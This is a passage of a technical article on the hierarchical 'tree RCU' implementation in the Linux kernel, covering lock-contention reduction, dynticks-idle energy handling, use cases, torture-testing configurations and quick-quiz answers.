the old implementation will be called “classic RCU”
and the new implementation will be called “tree RCU”.


	Review of RCU Fundamentals
 
	Brief Overview of Classic RCU Implementation
 RCU Desiderata
 
	Towards a More Scalable RCU Implementation
 
	Towards a Greener RCU Implementation
 State Machine
 Use Cases
 Testing

These sections are followed by
concluding remarks and the
answers to the Quick Quizzes.


Review of RCU Fundamentals
In its most basic form, RCU is a way of waiting for things to finish.
Of course, there are a great many other ways of waiting for things to
finish, including reference counts, reader-writer locks, events, and so on.
The great advantage of RCU is that it can wait for each of
(say) 20,000 different things without having to explicitly
track each and every one of them, and without having to worry about
the performance degradation, scalability limitations, complex deadlock
scenarios, and memory-leak hazards that are inherent in schemes
using explicit tracking.

In RCU's case, the things waited on are called
"RCU read-side critical sections".
An RCU read-side critical section starts with an
rcu_read_lock() primitive, and ends with a corresponding
rcu_read_unlock() primitive.
RCU read-side critical sections can be nested, and may contain pretty
much any code, as long as that code does not explicitly block or sleep
(although a special form of RCU called
"SRCU"
does permit general sleeping in SRCU read-side critical sections).
If you abide by these conventions, you can use RCU to wait for any
desired piece of code to complete.

RCU accomplishes this feat by indirectly determining when these
other things have finished, as has been described elsewhere for

Classic RCU and
realtime RCU.

In particular, as shown in the following figure, RCU is a way of
waiting for pre-existing RCU read-side critical sections to completely
finish, including memory operations executed by those critical sections.


However, note that RCU read-side critical sections
that begin after the beginning
of a given grace period can and will extend beyond the end of that grace
period.

The following section gives a very high-level view of how
the Classic RCU implementation operates.


Brief Overview of Classic RCU Implementation

The key concept behind the Classic RCU implementation is that
Classic RCU read-side critical sections are confined to kernel
code and are not permitted to block.
This means that any time a given CPU is seen
either blocking, in the idle loop, or exiting the kernel, we know that all
RCU read-side critical sections that were previously running on
that CPU must have completed.
Such states are called “quiescent states”, and
after each CPU has passed through at least one quiescent state,
the RCU grace period ends.


Classic RCU's most important data structure is the rcu_ctrlblk
structure, which contains the -&gt;cpumask field, which contains
one bit per CPU.
Each CPU's bit is set to one at the beginning of each grace period,
and each CPU must clear its bit after it passes through a quiescent
state.
Because multiple CPUs might want to clear their bits concurrently,
which would corrupt the -&gt;cpumask field, a
-&gt;lock 
spinlock is used to protect -&gt;cpumask, preventing any
such corruption.
Unfortunately, this spinlock can also suffer extreme contention if there
are more than a few hundred CPUs, which might soon become quite common
if multicore trends continue.
Worse yet, the fact that all CPUs must clear their own bit means
that CPUs are not permitted to sleep through a grace period, which limits
Linux's ability to conserve power.


The next section lays out what we need from a new non-real-time
RCU implementation.

RCU Desiderata

The list of RCU desiderata called out at LCA2005 for

real-time RCU is a very good start:


	Deferred destruction, so that an RCU grace period cannot end
	until all pre-existing RCU read-side critical sections have
	completed.
	Reliable, so that RCU supports 24x7 operation for years at
	a time.
	Callable from irq handlers.
	Contained memory footprint, so that mechanisms exist to expedite
	grace periods if there are too many callbacks.  (This is weakened
	from the LCA2005 list.)
	Independent of memory blocks, so that RCU can work with any
	conceivable memory allocator.
	Synchronization-free read side, so that only normal non-atomic
	instructions operating on CPU- or task-local memory are permitted.
	(This is strengthened from the LCA2005 list.)
	Unconditional read-to-write upgrade, which is used in several
	places in the Linux kernel where the update-side lock is
	acquired within the RCU read-side critical section.
	Compatible API.

Because this is not to be a real-time RCU, the requirement for
preemptable RCU read-side critical sections can be dropped.
However, we need to add a few more requirements to account for changes
over the past few years:


	Scalability with extremely low internal-to-RCU lock contention.
	RCU must support at least 1,024 CPUs gracefully, and preferably
	at least 4,096.
	Energy conservation: RCU must be able to avoid awakening
	low-power-state dynticks-idle CPUs, but still determine
	when the current grace period ends.
	This has been implemented in real-time RCU, but needs serious
	simplification.
	RCU read-side critical sections must be permitted in NMI
	handlers as well as irq handlers.  Note that preemptable RCU
	was able to avoid this requirement due to a separately
	implemented synchronize_sched().
	RCU must operate gracefully in face of repeated CPU-hotplug
	operations.
	This is simply carrying forward a requirement met by both
	classic and real-time.
	It must be possible to wait for all previously registered
	RCU callbacks to complete, though this is already provided
	in the form of rcu_barrier().
	Detecting CPUs that are failing to respond is desirable,
	to assist diagnosis both of RCU and of various infinite
	loop bugs and hardware failures that can prevent RCU grace
	periods from ending.
	Extreme expediting of RCU grace periods is desirable,
	so that an RCU grace period can be forced to complete within
	a few hundred microseconds of the last relevant RCU read-side
	critical second completing.
	However, such an operation would be expected to incur
	severe CPU overhead, and would be primarily useful when
	carrying out a long sequence of operations that each needed
	to wait for an RCU grace period.

The most pressing of the new requirements is the first one, scalability.
The next section therefore describes how to make order-of-magnitude reductions
in contention on RCU's internal locks.


Towards a More Scalable RCU Implementation
One effective way to reduce lock contention is to create a hierarchy,
as shown in the following figure.
Here, each of the four rcu_node structures has its own lock,
so that only CPUs 0 and 1 will acquire the lower left
rcu_node's lock, only CPUs 2 and 3 will acquire the
lower middle rcu_node's lock, and only CPUs 4 and 5
will acquire the lower right rcu_node's lock.
During any given grace period,
only one of the CPUs accessing each of the lower rcu_node
structures will access the upper rcu_node, namely, the
last of each pair of CPUs to record a quiescent state for the corresponding
grace period.


This results in a significant reduction in lock contention:
instead of six CPUs contending for a single lock each grace period,
we have only three for the upper rcu_node's lock 
(a reduction of 50%) and only
two for each of the lower rcu_nodes' locks (a reduction
of 67%).

The tree of rcu_node structures is embedded into
a linear array in the rcu_state structure,
with the root of the tree in element zero, as shown below for an eight-CPU
system with a three-level hierarchy.
The arrows link a given rcu_node structure to its parent.
Each rcu_node indicates the range of CPUs covered,
so that the root node covers all of the CPUs, each node in the second
level covers half of the CPUs, and each node in the leaf level covering
a pair of CPUs.
This array is allocated statically at compile time based on the value
of NR_CPUS.


The following sequence of six figures shows how grace periods are detected.
In the first figure, no CPU has yet passed through a quiescent state,
as indicated by the red rectangles.
Suppose that all six CPUs simultaneously try to tell RCU that they have
passed through a quiescent state.
Only one of each pair will be able to acquire the lock on the
corresponding lower rcu_node, and so the second figure
shows the result if the lucky CPUs are numbers 0, 3, and 5, as indicated
by the green rectangles.
Once these lucky CPUs have finished, then the other CPUs will acquire
the lock, as shown in the third figure.
Each of these CPUs will see that they are the last in their group,
and therefore all three will attempt to move to the upper
rcu_node.
Only one at a time can acquire the upper rcu_node structure's
lock, and the fourth, fifth, and sixth figures show the sequence of
states assuming that CPU 1, CPU 2, and CPU 4 acquire
the lock in that order.
The sixth and final figure in the group shows that all CPUs have passed
through a quiescent state, so that the grace period has ended.


In the above sequence, there were never more than three CPUs
contending for any one lock, in happy contrast to Classic RCU,
where all six CPUs might contend.
However, even more dramatic reductions in lock contention are
possible with larger numbers of CPUs.
Consider a hierarchy of rcu_node structures, with
64 lower structures and 64*64=4,096 CPUs, as shown in the following figure.


Here each of the lower rcu_node structures' locks
are acquired by 64 CPUs, a 64-times reduction from the 4,096 CPUs
that would acquire Classic RCU's single global lock.
Similarly, during a given grace period, only one CPU from each of
the lower rcu_node structures will acquire the
upper rcu_node structure's lock, which is again
a 64x reduction from the contention level that would be experienced
by Classic RCU running on a 4,096-CPU system.

Quick Quiz 1:
Wait a minute!  With all those new locks, how do you avoid deadlock?

Quick Quiz 2:
Why stop at a 64-times reduction?
Why not go for a few orders of magnitude instead?

Quick Quiz 3:
But I don't care about McKenney's lame excuses in the answer to
Quick Quiz 2!!!
I want to get the number of CPUs contending on a single lock down
to something reasonable, like sixteen or so!!!

The implementation maintains some per-CPU data, such as lists of
RCU callbacks, organized into rcu_data structures.
In addition, rcu (as in call_rcu()) and
rcu_bh (as in call_rcu_bh()) each maintain their own
hierarchy, as shown in the following figure.


Quick Quiz 4:
OK, so what is the story with the colors?

The next section discusses energy conservation.


Towards a Greener RCU Implementation
As noted earlier, an important goal of this effort is to leave sleeping
CPUs lie in order to promote energy conservation.
In contrast, classic RCU will happily awaken each and every sleeping CPU
at least once per grace period in some cases,
which is suboptimal in the case where
a small number of CPUs are busy doing RCU updates and the majority of
the CPUs are mostly idle.
This situation occurs frequently in systems sized for peak loads, and
we need to be able to accommodate it gracefully.
Furthermore, we need to fix a long-standing bug in Classic RCU where
a dynticks-idle CPU servicing an interrupt containing a long-running
RCU read-side critical section will fail to prevent an RCU grace period
from ending.

Quick Quiz 5:
Given such an egregious bug, why does Linux run at all?

This is accomplished by requiring that all CPUs manipulate counters
located in a per-CPU rcu_dynticks structure.
Loosely speaking, these counters have even-numbered values when the
corresponding CPU is in dynticks idle mode, and have odd-numbered values
otherwise.
RCU thus needs to wait for quiescent states only for those CPUs whose
rcu_dynticks counters are odd, and need not wake up sleeping
CPUs, whose counters will be even.
As shown in the following diagram, each per-CPU rcu_dynticks
is shared by the “rcu” and “rcu_bh” implementations.


The following section presents a high-level view of the RCU state machine.

State Machine
At a sufficiently high level, Linux-kernel RCU implementations can
be thought of as high-level state machines as shown in the following
schematic:


The common-case path through this state machine on a busy system
goes through the two uppermost loops, initializing at the
beginning of each grace period (GP),
waiting for quiescent states (QS), and noting when each CPU passes through
its first quiescent state for a given grace period.
On such a system, quiescent states will occur on each context switch,
or, for CPUs that are either idle or executing user-mode code, each
scheduling-clock interrupt.
CPU-hotplug events will take the state machine through the
“CPU Offline” box, while the presence of “holdout”
CPUs that fail to pass through quiescent states quickly enough will exercise
the path through the “Send resched IPIs to Holdout CPUs” box.
RCU implementations that avoid unnecessarily awakening dyntick-idle
CPUs will mark those CPUs as being in an extended quiescent state,
taking the “Y” branch out of the “CPUs in dyntick-idle
Mode?” decision diamond (but note that CPUs in dyntick-idle mode
will not be sent resched IPIs).
Finally, if CONFIG_RCU_CPU_STALL_DETECTOR is enabled,
truly excessive delays in reaching quiescent states will exercise the
“Complain About Holdout CPUs” path.

The events in the above state schematic interact with different
data structures, as shown below:


However, the state schematic does not directly translate into C code
for any of the RCU implementations.
Instead, these implementations are coded as an event-driven system within
the kernel.
Therefore, the following section describes some “use cases”,
or ways in which the RCU algorithm traverses the above state schematic
as well as the relevant data structures.


Use Cases
This section gives an overview of several “use cases”
within the RCU implementation, listing the data structures touched
and the functions invoked.
The use cases are as follows:


	Start a new grace period.
 
	Pass through a quiescent state.
 
	Announce a quiescent state to RCU.
 
	Enter and leave dynticks idle mode.
 
	Interrupt from dynticks idle mode.
 
	NMI from dynticks idle mode.
 
	Note that a CPU is in dynticks idle mode.
 
	Offline a CPU.
 
	Online a CPU.
 
	Detect a too-long grace period.

Each of these use cases is described in the following sections.


Start a New Grace Period
The rcu_start_gp() function starts a new grace period.
This function is invoked when a CPU having callbacks waiting for a
grace period notices that no grace period is in progress.

The rcu_start_gp() function updates state in
the rcu_state and rcu_data structures
to note the newly started grace period,
acquires the -&gt;onoff lock (and disables irqs) to exclude
any concurrent CPU-hotplug operations,
sets the
bits in all of the rcu_node structures to indicate
that all CPUs (including this one) must pass through a quiescent
state,
and finally
releases the -&gt;onoff lock.

The bit-setting operation is carried out in two phases.
First, the non-leaf rcu_node structures' bits are set without
holding any additional locks, and then finally each leaf rcu_node
structure's bits are set in turn while holding that structure's
-&gt;lock.

Quick Quiz 6:
But what happens if a CPU tries to report going through a quiescent
state (by clearing its bit) before the bit-setting CPU has finished?

Quick Quiz 7:
And what happens if all CPUs try to report going through a quiescent
state before the bit-setting CPU has finished, thus ending the new
grace period before it starts?


Pass Through a Quiescent State
The rcu and rcu_bh flavors of RCU have different sets of quiescent
states.
Quiescent states for rcu are context switch, idle (either dynticks or
the idle loop), and user-mode execution, while quiescent states for
rcu_bh are any code outside of softirq with interrupts enabled.
Note that an quiescent state for rcu is also a quiescent state
for rcu_bh.
Quiescent states for rcu are recorded by invoking rcu_qsctr_inc(),
while quiescent states for rcu_bh are recorded by invoking
rcu_bh_qsctr_inc().
These two functions record their state in the current CPU's
rcu_data structure.

These functions are invoked from the scheduler, from
__do_softirq(), and from rcu_check_callbacks().
This latter function is invoked from the scheduling-clock interrupt,
and analyzes state to determine whether this interrupt occurred within
a quiescent state, invoking rcu_qsctr_inc() and/or
rcu_bh_qsctr_inc(), as appropriate.
It also raises RCU_SOFTIRQ, which results in
rcu_process_callbacks() being invoked on the current
CPU at some later time from softirq context.


Announce a Quiescent State to RCU
The afore-mentioned rcu_process_callbacks() function
has several duties:


	Determining when to take measures to end an over-long grace period
	(via force_quiescent_state()).
	Taking appropriate action when some other CPU detected the end of
	a grace period (via rcu_process_gp_end()).
	“Appropriate action“ includes advancing this CPU's
	callbacks and recording the new grace period.
	This same function updates state in response to some other
	CPU starting a new grace period.
	Reporting the current CPU's quiescent states to the core RCU
	mechanism (via rcu_check_quiescent_state(), which
	in turn invokes cpu_quiet()).
	This of course might mark the end of the current grace period.
	Starting a new grace period if there is no grace period in progress
	and this CPU has RCU callbacks still waiting for a grace period
	(via cpu_needs_another_gp() and
	rcu_start_gp()).
	Invoking any of this CPU's callbacks whose grace period has ended
	(via rcu_do_batch()).

These interactions are carefully orchestrated in order to avoid
buggy behavior such as reporting a quiescent state from the previous
grace period against the current grace period.


Enter and Leave Dynticks Idle Mode
The scheduler invokes rcu_enter_nohz() to
enter dynticks-idle mode, and invokes rcu_exit_nohz()
to exit it.
The rcu_enter_nohz() function increments a per-CPU
dynticks_nesting variable and
also a per-CPU dynticks counter, the latter of which which must
then have an even-numbered value.
The rcu_exit_nohz() function decrements this same
per-CPU dynticks_nesting variable,
and again increments the per-CPU dynticks
counter, the latter of which must then have an odd-numbered value.

The dynticks counter can be sampled by other CPUs.
If the value is even, the first CPU is in an extended quiescent state.
Similarly, if the counter value changes during a given grace period,
the first CPU must have been in an extended quiescent state at some
point during the grace period.
However, there is another dynticks_nmi per-CPU variable
that must also be sampled, as will be discussed below.


Interrupt from Dynticks Idle Mode
Interrupts from dynticks idle mode are handled by
rcu_irq_enter() and rcu_irq_exit().
The rcu_irq_enter() function increments the
per-CPU dynticks_nesting variable, and, if the prior
value was zero, also increments the dynticks
per-CPU variable (which must then have an odd-numbered value).

The rcu_irq_exit() function decrements the
per-CPU dynticks_nesting variable, and, if the new
value is zero, also increments the dynticks
per-CPU variable (which must then have an even-numbered value).

Note that entering an irq handler exits dynticks idle mode
and vice versa.
This enter/exit anti-correspondence can cause much confusion.
You have been warned.


NMI from Dynticks Idle Mode
NMIs from dynticks idle mode are handled by rcu_nmi_enter()
and rcu_nmi_exit().
These functions both increment the dynticks_nmi counter,
but only if the aforementioned dynticks counter is even.
In other words, NMI's refrain from manipulating the
dynticks_nmi counter if the NMI occurred in non-dynticks-idle
mode or within an interrupt handler.

The only difference between these two functions is the error checks,
as rcu_nmi_enter() must leave the dynticks_nmi
counter with an odd value, and rcu_nmi_exit() must leave
this counter with an even value.


Note That a CPU is in Dynticks Idle Mode
The force_quiescent_state() function implements a
two-phase state machine.
In the first phase (RCU_SAVE_DYNTICK), the
dyntick_save_progress_counter() function scans the CPUs that
have not yet reported a quiescent state, recording their per-CPU
dynticks and dynticks_nmi counters.
If these counters both have even-numbered values, then the corresponding
CPU is in dynticks-idle state, which is therefore noted as an extended
quiescent state (reported via cpu_quiet_msk()).
In the second phase (RCU_FORCE_QS), the
rcu_implicit_dynticks_qs() function again scans the CPUs
that have not yet reported a quiescent state (either explicitly or
implicitly during the RCU_SAVE_DYNTICK phase), again checking the
per-CPU dynticks and dynticks_nmi counters.
If each of these has either changed in value or is now even, then
the corresponding CPU has either passed through or is now in dynticks
idle, which as before is noted as an extended quiescent state.

If rcu_implicit_dynticks_qs() finds that a given CPU
has neither been in dynticks idle mode nor reported a quiescent state,
it invokes rcu_implicit_offline_qs(), which checks to see
if that CPU is offline, which is also reported as an extended quiescent
state.
If the CPU is online, then rcu_implicit_offline_qs() sends
it a reschedule IPI in an attempt to remind it of its duty to report
a quiescent state to RCU.

Note that force_quiescent_state() does not directly
invoke either dyntick_save_progress_counter() or
rcu_implicit_dynticks_qs(), instead passing these functions
to an intervening rcu_process_dyntick() function that
abstracts out the common code involved in scanning the CPUs and reporting
extended quiescent states.

Quick Quiz 8:
And what happens if one CPU comes out of dyntick-idle mode and then
passed through a quiescent state just as another CPU notices that the
first CPU was in dyntick-idle mode?
Couldn't they both attempt to report a quiescent state at the same
time, resulting in confusion?

Quick Quiz 9:
But what if all the CPUs end up in dyntick-idle mode?
Wouldn't that prevent the current RCU grace period from ever ending?

Quick Quiz 10:
Given that force_quiescent_state() is a two-phase state
machine, don't we have double the scheduling latency due to scanning
all the CPUs?


Offline a CPU
CPU-offline events cause rcu_cpu_notify() to invoke
rcu_offline_cpu(), which in turn invokes
__rcu_offline_cpu() on both the rcu and the rcu_bh
instances of the data structures.
This function clears the outgoing CPU's bits so that future grace
periods will not expect this CPU to announce quiescent states,
and further invokes cpu_quiet() in order to announce
the offline-induced extended quiescent state.
This work is performed with the global -&gt;onofflock
held in order to prevent interference with concurrent grace-period
initialization.

Quick Quiz 11:
But the other reason to hold -&gt;onofflock is to prevent
multiple concurrent online/offline operations, right?


Online a CPU
CPU-online events cause rcu_cpu_notify() to invoke
rcu_online_cpu(), which initializes the incoming CPU's
dynticks state, and then invokes rcu_init_percpu_data()
to initialize the incoming CPU's rcu_data structure,
and also to set this CPU's bits (again protected by
the global -&gt;onofflock) so that future grace periods
will wait for a quiescent state from this CPU.
Finally, rcu_online_cpu()
sets up the RCU softirq vector for this CPU.

Quick Quiz 12:
Given all these acquisitions of the global -&gt;onofflock, won't there
be horrible lock contention when running with thousands of CPUs?


Detect a Too-Long Grace Period
When the CONFIG_RCU_CPU_STALL_DETECTOR kernel parameter
is specified, the record_gp_stall_check_time() function
records the time and also a timestamp set three seconds into the future.
If the current grace period still has not ended by that time, the
check_cpu_stall() function will check for the culprit,
invoking print_cpu_stall() if the current CPU is the
holdout, or print_other_cpu_stall() if it is some other CPU.
A two-jiffies offset helps ensure that CPUs report on themselves
when possible, taking advantage of the fact that a CPU can normally
do a better job of tracing its own stack than it can tracing some other
CPU's stack.

Testing
RCU is fundamental synchronization code, so any failure of RCU
results in random, difficult-to-debug memory corruption.
It is therefore extremely important that RCU be highly reliable.
Some of this reliability stems from careful design, but at the
end of the day we must also rely on heavy stress testing, otherwise
known as torture.

Fortunately, although there has been some debate as to exactly
what populations are covered by the provisions of the
Geneva Convention,
it is still the case that it does not apply to software.
Therefore, it is still legal to torture your software.
In fact, it is strongly encouraged, because if you don't torture your
software, it will end up torturing you by crashing at the most
inconvenient times imaginable.

Therefore, we torture RCU quite vigorously using the rcutorture module.

However, it is not sufficient to torture the common-case uses of RCU.
It is also necessary to torture it in unusual situations, for example,
when concurrently onlining and offlining CPUs and when CPUs are concurrently
entering and exiting dynticks idle mode.
I use a
script to online and offline CPUs,
and use the test_no_idle_hz module parameter to rcutorture
to stress-test dynticks idle mode.
Just to be fully paranoid, I sometimes run a kernbench workload in parallel
as well.
Ten hours of this sort of torture on a 128-way machine seems sufficient
to shake out most bugs.

Even this is not the complete story.
As Alexey Dobriyan and Nick Piggin demonstrated in early 2008, it is
also necessary to torture RCU with all relevant combinations of kernel
parameters.
The relevant kernel parameters may be identified using yet another
script, and are as follows:


 CONFIG_CLASSIC_RCU: Classic RCU.
 CONFIG_PREEMPT_RCU: Preemptable (real-time) RCU.
 CONFIG_TREE_RCU: Classic RCU for huge SMP systems.
 CONFIG_RCU_FANOUT: Number of children for each
		rcu_node.
 CONFIG_RCU_FANOUT_EXACT: Balance the
		rcu_node tree.
 CONFIG_HOTPLUG_CPU: Allow CPUs to be offlined
		and onlined.
 CONFIG_NO_HZ: Enable dyntick-idle mode.
 CONFIG_SMP: Enable multi-CPU operation.
 CONFIG_RCU_CPU_STALL_DETECTOR: Enable RCU to detect
		when CPUs go on extended quiescent-state vacations.
 CONFIG_RCU_TRACE: Generate RCU trace files in debugfs.

We ignore the CONFIG_DEBUG_LOCK_ALLOC configuration
variable under the perhaps-naive assumption that hierarchical RCU
could not have broken lockdep.
There are still 10 configuration variables, which would result in
1,024 combinations if they were independent boolean variables.
Fortunately the first three are mutually exclusive, which reduces
the number of combinations down to 384, but CONFIG_RCU_FANOUT
can take on values from 2 to 64, increasing the number of combinations
to 12,096.
This is an infeasible number of combinations.

One key observation is that only CONFIG_NO_HZ
and CONFIG_PREEMPT can be expected to have changed behavior
if either CONFIG_CLASSIC_RCU or
CONFIG_PREEMPT_RCU are in effect, as only these portions
of the two pre-existing RCU implementations were changed during this effort.
This cuts out almost two thirds of the possible combinations.

Furthermore, not all of the possible values of
CONFIG_RCU_FANOUT produce significantly different results,
in fact only a few cases really need to be tested separately:


	Single-node “tree”.
	Two-level balanced tree.
	Three-level balanced tree.
	Autobalanced tree, where CONFIG_RCU_FANOUT
	specifies an unbalanced tree, but such that it is auto-balanced
	in absence of CONFIG_RCU_FANOUT_EXACT.
	Unbalanced tree.

Looking further, CONFIG_HOTPLUG_CPU makes sense only
given CONFIG_SMP, and CONFIG_RCU_CPU_STALL_DETECTOR
is independent, and really only needs to be tested once (though someone
even more paranoid than am I might decide to test it both with
and without CONFIG_SMP).
Similarly, CONFIG_RCU_TRACE need only be tested once,
but the truly paranoid (such as myself) will choose to run it both with
and without CONFIG_NO_HZ.

This allows us to obtain excellent coverage of RCU with only 15
test cases.
All test cases specify the following configuration parameters in order
to run rcutorture and so that CONFIG_HOTPLUG_CPU=n actually
takes effect:


The 15 test cases are as follows:


	Force single-node “tree” for small systems:
	
	Force two-level tree for large systems:
	
	Force three-level tree for huge systems:
	
	Test autobalancing to a balanced tree:
	
	Test unbalanced tree:
	
	Disable CPU-stall detection:
	
	Disable CPU-stall detection and dyntick idle mode:
	
	Disable CPU-stall detection and CPU hotplug:
	
	Disable CPU-stall detection, dyntick idle mode, and CPU hotplug:
	
	Disable SMP, CPU-stall detection, dyntick idle mode, and CPU hotplug:
	
This combination located a number of compiler warnings.
	Disable SMP and CPU hotplug:
	
	Test Classic RCU with dynticks idle but without preemption:
	
	Test Classic RCU with preemption but without dynticks idle:
	
	Test Preemptable RCU with dynticks idle:
	
	Test Preemptable RCU without dynticks idle:
	

For a large change that affects RCU core code, one should run
rcutorture for each of the above combinations, and concurrently
with CPU offlining and onlining for cases with
CONFIG_HOTPLUG_CPU.
For small changes, it may suffice to run kernbench in each case.
Of course, if the change is confined to a particular subset of
the configuration parameters, it may be possible to reduce the
number of test cases.

Torturing software: the Geneva Convention does not (yet) prohibit
it, and I strongly recommend it!!!

Conclusion
This hierarchical implementation of RCU reduces lock contention,
avoids unnecessarily awakening dyntick-idle sleeping CPUs, while
helping to debug Linux's hotplug-CPU code paths.
This implementation is designed to handle single systems with
thousands of CPUs, and on 64-bit systems has an architectural
limitation of a quarter million CPUs, a limit I expect to be
sufficient for at least the next few years.

This RCU implementation of course has some limitations:


	The force_quiescent_state() can scan the full
	set of CPUs with irqs disabled.
	This would be fatal in a real-time implementation of RCU,
	so if hierarchy ever needs to be introduced to preemptable
	RCU, some other approach will be required.
	It is possible that it will be problematic on 4,096-CPU
	systems, but actual testing on such systems is required
	to prove this one way or the other.
	
	On busy systems, the force_quiescent_state() scan
	would not be expected to happen,
	as CPUs should pass through quiescent states within three
	jiffies of the start of a quiescent state.  On semi-busy
	systems, only the CPUs in dynticks-idle mode throughout would
	need to be scanned.
	In some cases, for example when a dynticks-idle CPU is handling
	an interrupt during a scan, subsequent scans are required.
	However, each such scan is performed separately, so scheduling
	latency is degraded by the overhead of only one such scan.
	
	If this scan proves problematic, one straightforward solution
	would be to do the scan incrementally.
	This would increase code complexity slightly and would also
	increase the time required to end a grace period, but would
	nonetheless be a likely solution.
	
	The rcu_node hierarchy is created at compile
	time, and is therefore sized for the worst-case NR_CPUS
	number of CPUs.
	However, even for 4,096 CPUs, the rcu_node
	hierarchy consumes only 65 cache lines on a 64-bit machine
	(and just you try accommodating 4,096 CPUs on a 32-bit machine!).
	Of course, a kernel built with NR_CPUS=4096
	running on a 16-CPU machine would use a two-level tree when
	a single-node tree would work just fine.
	Although this configuration would incur added locking overhead,
	this does not affect hot-path read-side code, so should not be a
	problem in practice.
	
	This patch does increase kernel text and data somewhat:
	the old Classic RCU implementation consumes 1,757 bytes of
	kernel text and 456 bytes of kernel data for a total of 2,213 bytes,
	while the new hierarchical RCU implementation consumes 4,006
	bytes of kernel text and 624 bytes of kernel data for a total
	of 4,630 bytes on a NR_CPUS=4 system.
	This is a non-problem even for most embedded systems, which
	often come with hundreds of megabytes of main memory.
	However, if this is a problem for tiny embedded systems, it may
	be necessary to provide both “scale up” and
	“scale down” implementations of RCU.

This hierarchical RCU implementation should nevertheless be a vast
improvement over Classic RCU for machines with hundreds of CPUs.
After all, Classic RCU was designed for systems with only 16-32 CPUs.

At some point, it may be necessary to also apply hierarchy to the
preemptable RCU implementation.
This will be challenging due to the modular arithmetic used on the
per-CPU counter pairs, but should be doable.

Acknowledgements
I am indebted to Manfred Spraul for ideas, review comments,
bugs spotted, as well as some good healthy competition,
to Josh Triplett, Ingo Molnar, Peter Zijlstra, Mathieu Desnoyers,
Lai Jiangshan, Andi Kleen, Andy Whitcroft, Gautham Shenoy,
and Andrew Morton for review comments,
and to Thomas Gleixner for much help with timer issues.
I am thankful to Jon M. Tollefson, Tim Pepper, Andrew Theurer,
Jose R. Santos, Andy Whitcroft, Darrick Wong, Nishanth Aravamudan, Anton
Blanchard, and Nathan Lynch for keeping machines alive despite
my (ab)use for this project.
We all owe thanks to Peter Zijlstra, Gautham Shenoy, Lai Jiangshan,
and Manfred Spraul for helping (in some cases unwittingly) render
this document at least partially human readable.
Finally, I am grateful to Kathy Bennett for her support of this effort.

This work represents the view of the authors and does not necessarily
represent the view of IBM.

Linux is a registered trademark of Linus Torvalds.

Other company, product, and service names may be trademarks or
service marks of others.


Answers to Quick Quizzes
Quick Quiz 1:
Wait a minute!  With all those new locks, how do you avoid deadlock?

Answer:
Deadlock is avoided by never holding more than one of the
rcu_node structures' locks at a given time.
This algorithm uses two more locks, one to prevent CPU hotplug operations
from running concurrently with grace-period advancement
(onofflock) and another
to permit only one CPU at a time from forcing a quiescent state
to end quickly (fqslock).
These are subject to a locking hierarchy, so that
fqslock must be acquired before
onofflock, which in turn must be acquired before
any of the rcu_node structures' locks.

Also, as a practical matter, refusing to ever hold more than
one of the rcu_node locks means that it is unnecessary
to track which ones are held.
Such tracking would be painful as well as unnecessary.

Back to Quick Quiz 1.
Quick Quiz 2:
Why stop at a 64-times reduction?
Why not go for a few orders of magnitude instead?

Answer: RCU works with no problems on
systems with a few hundred CPUs, so allowing 64 CPUs to contend on
a single lock leaves plenty of headroom.
Keep in mind that these locks are acquired quite rarely, as each
CPU will check in about one time per grace period, and grace periods
extend for milliseconds.

Back to Quick Quiz 2.
Quick Quiz 3:
But I don't care about McKenney's lame excuses in the answer to
Quick Quiz 2!!!
I want to get the number of CPUs contending on a single lock down
to something reasonable, like sixteen or so!!!

Answer:
OK, have it your way, then!!!
Set CONFIG_RCU_FANOUT=16 and (for NR_CPUS=4096)
you will get a
three-level hierarchy with with 256 rcu_node structures
at the lowest level, 16 rcu_node structures as intermediate
nodes, and a single root-level rcu_node.
The penalty you will pay is that more rcu_node structures
will need to be scanned when checking to see which CPUs need help
completing their quiescent states (256 instead of only 64).

Back to Quick Quiz 3.
Quick Quiz 4:
OK, so what is the story with the colors?

Answer:
Data structures analogous to rcu_state (including
rcu_ctrlblk) are yellow,
those containing the bitmaps used to determine when CPUs have checked
in are pink,
and the per-CPU rcu_data structures are blue.
Later on, we will see that data structures used to conserve energy
(such as rcu_dynticks) will be green.

Back to Quick Quiz 4.
Quick Quiz 5:
Given such an egregious bug, why does Linux run at all?

Answer:
Because the Linux kernel contains device drivers that are (relatively)
well behaved.
Few if any of them spin in RCU read-side critical sections for the
many milliseconds that would be required to provoke this bug.
The bug nevertheless does need to be fixed, and this variant of
RCU does fix it.

Back to Quick Quiz 5.
Quick Quiz 6:
But what happens if a CPU tries to report going through a quiescent
state (by clearing its bit) before the bit-setting CPU has finished?

Answer:
There are three cases to consider here:


	A CPU corresponding to a non-yet-initialized leaf rcu_node
	structure tries to report a quiescent state.
	This CPU will see its bit already cleared, so will give up on
	reporting its quiescent state.
	Some later quiescent state will serve for the new grace period.
	A CPU corresponding to a leaf rcu_node structure that
	is currently being initialized tries to report a quiescent state.
	This CPU will see that the rcu_node structure's
	-&gt;lock is held, so will spin until it is
	released.
	But once the lock is released, the rcu_node
	structure will have been initialized, reducing to the
	following case.
	A CPU corresponding to a leaf rcu_node that has
	already been initialized tries to report a quiescent state.
	This CPU will find its bit set, and will therefore clear it.
	If it is the last CPU for that leaf node, it will
	move up to the next level of the hierarchy.
	However, this CPU cannot possibly be the last CPU in the system to
	report a quiescent state, given that the CPU doing the initialization
	cannot yet have checked in.

So, in all three cases, the potential race is resolved correctly.

Back to Quick Quiz 6.
Quick Quiz 7:
And what happens if all CPUs try to report going through a quiescent
state before the bit-setting CPU has finished, thus ending the new
grace period before it starts?

Answer:
The bit-setting CPU cannot pass through a
quiescent state during initialization, as it has irqs disabled.
Its bits therefore remain non-zero, preventing the grace period from
ending until the data structure has been fully initialized.

Back to Quick Quiz 7.
Quick Quiz 8:
And what happens if one CPU comes out of dyntick-idle mode and then
passed through a quiescent state just as another CPU notices that the
first CPU was in dyntick-idle mode?
Couldn't they both attempt to report a quiescent state at the same
time, resulting in confusion?

Answer:
They will both attempt to acquire the lock on the same leaf
rcu_node structure.
The first one to acquire the lock will report the quiescent state
and clear the appropriate bit, and the second one to acquire the
lock will see that this bit has already been cleared.

Back to Quick Quiz 8.
Quick Quiz 9:
But what if all the CPUs end up in dyntick-idle mode?
Wouldn't that prevent the current RCU grace period from ever ending?

Answer:
Indeed it will!
However, CPUs that have RCU callbacks are not permitted to enter
dyntick-idle mode, so the only way that all the CPUs could
possibly end up in dyntick-idle mode would be if there were
absolutely no RCU callbacks in the system.
And if there are no RCU callbacks in the system, then there is no
need for the RCU grace period to end.
In fact, there is no need for the RCU grace period to even start.

RCU will restart if some irq handler does a call_rcu(),
